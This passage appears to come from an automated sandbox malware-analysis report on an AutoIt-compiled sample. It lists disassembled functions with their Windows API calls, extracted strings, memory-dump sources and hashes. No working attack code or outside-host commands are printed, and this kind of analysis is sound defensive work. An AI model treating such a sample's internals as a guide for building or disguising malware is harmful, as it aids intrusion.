                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7d17fcbbc11c15caa134db53d7bb30c52f8588d3510ba9389e3638fbb26c1140
                                                                                  • Instruction ID: f5df1f0bcb9467894e4868afcf1ed6d3949abb2282fd21bde763ad5eed53c17b
                                                                                  • Opcode Fuzzy Hash: 7d17fcbbc11c15caa134db53d7bb30c52f8588d3510ba9389e3638fbb26c1140
                                                                                  • Instruction Fuzzy Hash: 2912BF7090020E9FDB24DF55C444ABEBBF1FF58305F14806ADA469B361E739AD82CB96
                                                                                  Function 004FAF50 Relevance: .5, Instructions: 514COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 3728558374-0
                                                                                  • Opcode ID: 3fe1dca958730875c259e0b4a37b94d3896b8c0fc2474892ca5a664d2d3c06f5
                                                                                  • Instruction ID: 44c048173c7731a3ae0a64a7d11fc9324a1af3805dbb529a054ff81271fb2038
                                                                                  • Opcode Fuzzy Hash: 3fe1dca958730875c259e0b4a37b94d3896b8c0fc2474892ca5a664d2d3c06f5
                                                                                  • Instruction Fuzzy Hash: 6302D170A00209DFCF14DF68D982ABEBBB5FF45300F10846AE906DB295EB35DA15CB95
                                                                                  Function 005102A4 Relevance: .3, Instructions: 345COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                  • Instruction ID: ac1025df42c106e482e22e4e713f2437a0d29964f1781588fa18773f40a1d485
                                                                                  • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                  • Instruction Fuzzy Hash: 56C1D3322051930AEF6D463AC47447EBEA17BA27B531A176DD8B3CB4D1EF60C5A4D720
                                                                                  Function 005106D9 Relevance: .3, Instructions: 341COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                  • Instruction ID: e06aff1dde32568508b1ed813364004d9bc3ee42e1479c1510bc69d56891a2dd
                                                                                  • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                  • Instruction Fuzzy Hash: 51C1C1322091930AEF6D4639C43447EBEA17FA2BB531A276DD4B2CB4D5EF20D5A4D720
                                                                                  Function 0050FA57 Relevance: .3, Instructions: 323COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                  • Instruction ID: 6e3011a137f1bbf5eede4aa5302a38f0560705b32303abfe10e1162d7a86122e
                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                  • Instruction Fuzzy Hash: FDC17E322090930ADB7D4639C47443EBFA57BA2BB531A077DD8B2CB9D5EE20D964D720
                                                                                  Function 0054A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DeleteObject.GDI32(00000000), ref: 0054A2FE
                                                                                  • DeleteObject.GDI32(00000000), ref: 0054A310
                                                                                  • DestroyWindow.USER32 ref: 0054A31E
                                                                                  • GetDesktopWindow.USER32 ref: 0054A338
                                                                                  • GetWindowRect.USER32(00000000), ref: 0054A33F
                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0054A480
                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0054A490
                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A4D8
                                                                                  • GetClientRect.USER32(00000000,?), ref: 0054A4E4
                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0054A51E
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A540
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A553
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A55E
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0054A567
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A576
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0054A57F
                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A586
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0054A591
                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A5A3
                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0057D9BC,00000000), ref: 0054A5B9
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0054A5C9
                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0054A5EF
                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0054A60E
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A630
                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0054A81D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                  • API String ID: 2211948467-2373415609
                                                                                  • Opcode ID: d8634e01449f83524b6edc9f01baa397501956daec5ff672b219fc979bea30f4
                                                                                  • Instruction ID: b628342e213d7b959f8390772e62c8f02defcbc6249f930f6d4161d4ca359511
                                                                                  • Opcode Fuzzy Hash: d8634e01449f83524b6edc9f01baa397501956daec5ff672b219fc979bea30f4
                                                                                  • Instruction Fuzzy Hash: 5202AB75900208EFDB54DFA4DC89EAE7BB9FF48314F008159F909AB2A1D734AD45DB60
                                                                                  Function 0055D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0055D2DB
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0055D30C
                                                                                  • GetSysColor.USER32(0000000F), ref: 0055D318
                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 0055D332
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0055D341
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0055D36C
                                                                                  • GetSysColor.USER32(00000010), ref: 0055D374
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 0055D37B
                                                                                  • FrameRect.USER32(?,?,00000000), ref: 0055D38A
                                                                                  • DeleteObject.GDI32(00000000), ref: 0055D391
                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0055D3DC
                                                                                  • FillRect.USER32(?,?,00000000), ref: 0055D40E
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0055D439
                                                                                    • Part of subcall function 0055D575: GetSysColor.USER32(00000012), ref: 0055D5AE
                                                                                    • Part of subcall function 0055D575: SetTextColor.GDI32(?,?), ref: 0055D5B2
                                                                                    • Part of subcall function 0055D575: GetSysColorBrush.USER32(0000000F), ref: 0055D5C8
                                                                                    • Part of subcall function 0055D575: GetSysColor.USER32(0000000F), ref: 0055D5D3
                                                                                    • Part of subcall function 0055D575: GetSysColor.USER32(00000011), ref: 0055D5F0
                                                                                    • Part of subcall function 0055D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0055D5FE
                                                                                    • Part of subcall function 0055D575: SelectObject.GDI32(?,00000000), ref: 0055D60F
                                                                                    • Part of subcall function 0055D575: SetBkColor.GDI32(?,00000000), ref: 0055D618
                                                                                    • Part of subcall function 0055D575: SelectObject.GDI32(?,?), ref: 0055D625
                                                                                    • Part of subcall function 0055D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0055D644
                                                                                    • Part of subcall function 0055D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0055D65B
                                                                                    • Part of subcall function 0055D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0055D670
                                                                                    • Part of subcall function 0055D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0055D698
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                  • String ID:
                                                                                  • API String ID: 3521893082-0
                                                                                  • Opcode ID: 511250498b769eb79be099a5938fa7ba3044d19aaf2eba3b7c7921e92cc70156
                                                                                  • Instruction ID: af4170080ac466e83b68ad71bd9ef238eff36a0c2c143da3eaa5b374666e3ca4
                                                                                  • Opcode Fuzzy Hash: 511250498b769eb79be099a5938fa7ba3044d19aaf2eba3b7c7921e92cc70156
                                                                                  • Instruction Fuzzy Hash: EF918072408301BFCB109F64EC48E6B7BB9FF95325F100A19F956961E0D771D988EB62
                                                                                  Function 0050B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DestroyWindow.USER32 ref: 0050B98B
                                                                                  • DeleteObject.GDI32(00000000), ref: 0050B9CD
                                                                                  • DeleteObject.GDI32(00000000), ref: 0050B9D8
                                                                                  • DestroyIcon.USER32(00000000), ref: 0050B9E3
                                                                                  • DestroyWindow.USER32(00000000), ref: 0050B9EE
                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0056D2AA
                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0056D2E3
                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0056D711
                                                                                    • Part of subcall function 0050B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0050B759,?,00000000,?,?,?,?,0050B72B,00000000,?), ref: 0050BA58
                                                                                  • SendMessageW.USER32 ref: 0056D758
                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0056D76F
                                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 0056D785
                                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 0056D790
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                  • String ID: 0
                                                                                  • API String ID: 464785882-4108050209
                                                                                  • Opcode ID: 24d919faeb747e35720a68395ff92289b4fd866aab2c374fe4b496d7523e0a4b
                                                                                  • Instruction ID: 5eb95c2cacd3ea88c7aa933927bbb51813c88e2ff717361d35802262254cac64
                                                                                  • Opcode Fuzzy Hash: 24d919faeb747e35720a68395ff92289b4fd866aab2c374fe4b496d7523e0a4b
                                                                                  • Instruction Fuzzy Hash: 45127F70A042029FDB15CF18C888BA9BFF5FF55304F144969E989DB692C731EC85DBA1
                                                                                  Function 0053DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0053DBD6
                                                                                  • GetDriveTypeW.KERNEL32(?,0058DC54,?,\\.\,0058DC00), ref: 0053DCC3
                                                                                  • SetErrorMode.KERNEL32(00000000,0058DC54,?,\\.\,0058DC00), ref: 0053DE29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DriveType
                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                  • API String ID: 2907320926-4222207086
                                                                                  • Opcode ID: 886f324418335e20a8148d86d50c77ba3a03437321a99877cf685ce2e201a963
                                                                                  • Instruction ID: f82c3941404a4106407fed09b9f38d4dd6b1aa8e71a44e410bdf6cbcff8d79ff
                                                                                  • Opcode Fuzzy Hash: 886f324418335e20a8148d86d50c77ba3a03437321a99877cf685ce2e201a963
                                                                                  • Instruction Fuzzy Hash: 4F517D3024830AABC710EB10E99282DFFB5FB95B48F205C1AF5479B291DB60DD45DA72
                                                                                  Function 004FCC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp
                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                  • API String ID: 1038674560-86951937
                                                                                  • Opcode ID: b3230e0d588424df8e094a1a277eebd6aa6d058aa70e22b07c56e988531ef983
                                                                                  • Instruction ID: 0e55138d602f666ac82137afde3bd520cb3c5ac48b85ec6f11b3f40451499504
                                                                                  • Opcode Fuzzy Hash: b3230e0d588424df8e094a1a277eebd6aa6d058aa70e22b07c56e988531ef983
                                                                                  • Instruction Fuzzy Hash: 2081F73064060E7ADB20BB64DD87FBF7FA8BF55304F04402AFA05A71C6EB659941C6A9
                                                                                  Function 0055C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0055C788
                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0055C83E
                                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 0055C859
                                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0055CB15
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID: 0
                                                                                  • API String ID: 2326795674-4108050209
                                                                                  • Opcode ID: 486cc0c1f29511c70198615e175115c243bb963fd9ba7cb3dd30b0d6a0022912
                                                                                  • Instruction ID: 0394a0b1f8935c4c72b81e0fa9ddcb4c3c8cbff2ac9a9cb1daf1973c18978b52
                                                                                  • Opcode Fuzzy Hash: 486cc0c1f29511c70198615e175115c243bb963fd9ba7cb3dd30b0d6a0022912
                                                                                  • Instruction Fuzzy Hash: F6F1A371104301AFD7218F24CCA9BAABFF4FF49356F040A1EF999962A1C774D948DBA1
                                                                                  Function 0055638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?,0058DC00), ref: 00556449
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper
                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                  • API String ID: 3964851224-45149045
                                                                                  • Opcode ID: 8767906f2a48592bc6f12daae472af6950973d67b03814b6e562089ad7b730e8
                                                                                  • Instruction ID: 051b31d633bfa78c29175deb821c6aa4701105801ba078c0701c1309db68ebe7
                                                                                  • Opcode Fuzzy Hash: 8767906f2a48592bc6f12daae472af6950973d67b03814b6e562089ad7b730e8
                                                                                  • Instruction Fuzzy Hash: 3EC17D302042868BDA04EF10C565A6E7FE5BFD5345F50485EFC865B2E2EB25ED4ECB82
                                                                                  Function 0055D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000012), ref: 0055D5AE
                                                                                  • SetTextColor.GDI32(?,?), ref: 0055D5B2
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0055D5C8
                                                                                  • GetSysColor.USER32(0000000F), ref: 0055D5D3
                                                                                  • CreateSolidBrush.GDI32(?), ref: 0055D5D8
                                                                                  • GetSysColor.USER32(00000011), ref: 0055D5F0
                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0055D5FE
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0055D60F
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0055D618
                                                                                  • SelectObject.GDI32(?,?), ref: 0055D625
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0055D644
                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0055D65B
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0055D670
                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0055D698
                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0055D6BF
                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 0055D6DD
                                                                                  • DrawFocusRect.USER32(?,?), ref: 0055D6E8
                                                                                  • GetSysColor.USER32(00000011), ref: 0055D6F6
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0055D6FE
                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0055D712
                                                                                  • SelectObject.GDI32(?,0055D2A5), ref: 0055D729
                                                                                  • DeleteObject.GDI32(?), ref: 0055D734
                                                                                  • SelectObject.GDI32(?,?), ref: 0055D73A
                                                                                  • DeleteObject.GDI32(?), ref: 0055D73F
                                                                                  • SetTextColor.GDI32(?,?), ref: 0055D745
                                                                                  • SetBkColor.GDI32(?,?), ref: 0055D74F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                  • String ID:
                                                                                  • API String ID: 1996641542-0
                                                                                  • Opcode ID: 2af3a4f348d555559edcc5cf54ac6dfaaaff4bf1ca3c9f2e8cb7467667d9469f
